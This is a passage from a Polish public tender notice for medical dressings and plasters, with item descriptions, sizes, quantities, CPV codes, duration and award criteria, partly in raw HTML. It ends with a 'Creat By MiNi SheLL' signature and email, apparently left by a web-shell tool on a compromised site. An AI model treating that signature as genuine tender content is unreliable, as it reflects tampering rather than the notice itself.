podrażnień, przepuszczalny dla pary wodnej i powietrza, 	20 cm x 10
cm	op*25 szt	500	 	 	 	 	 	 	 	 
18	.Opatrunek samoprzylepny jałowy, chłonny, posiadający centralnie umieszczoną warstwę chłonną ze 100% wiskozy, zaokrąglone rogi, przecięcie papieru wzdłuż krótszego boku, zewnętrzną stronę z
impregnacją wodoodporną, z klejem kauczukowym niepowodującym
podrażnień, przepuszczalny dla pary wodnej i powietrza, 	7,2 x 5 cm	op*50 szt	900	 	 	 	 	 	 	 	 
19	.przylepiec na 100 % tkaninie
wiskozowej, z klejem z
syntetycznego kauczuku, pakowany
pojedynczo w kartonik , o
ząbkowanych brzegach na szpulce	5 cm x 9,1 m	1 szt	300	 	 	 	 	 	 	 	 
20.	przylepiec na 100 % tkaninie
wiskozowej, z klejem z
syntetycznego kauczuku, pakowany
pojedynczo w kartonik, o
ząbkowanych brzegach na szpulce	2,5 cm x 9,1
m	1 szt	350	 	 	 	 	 	 	 	 
21	.przylepiec na włókninie, pakowany
pojedynczo w kartoniku, na szpulce	1,25 cm x
9,20 m	1 szt	80	 	 	 	 	 	 	 	 
22.	przylepiec na włókninie, pakowany
pojedynczo w kartoniku, na szpulce	2,5 cm x 9,20
m	1 szt	1 500	 	 	 	 	 	 	 	 
23.	przylepiec z włókniny do łączenia
brzegów ran, zastępujący nici
chirurgiczne	3 x 76 mm	op a`5 szt	400	 	 	 	 	 	 	 	 
24.	Wókninowy przylepiec chirurgiczny ,
na rolce, pakowano pojedynczo w
kartoniku	10 m x 20 cm	1 szt	100	 	 	 	 	 	 	 	 
25.	Wókninowy przylepiec chirurgiczny ,
na rolce, pakowano pojedynczo w
kartoniku	10 m x 10 cm	1 szt	50	 	 	 	 	 	 	 	 
26.	plaster włókninowy z opatrunkiem	8cm x 1 m	mb	50	 	 	 	 	 	 	 	 
27.	plaster na porowatej , przeźroczystej
folii z możliwością dzielenia bez
użycia nożyczek na szpulce	5cm x 5cm	1 szt	1 800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com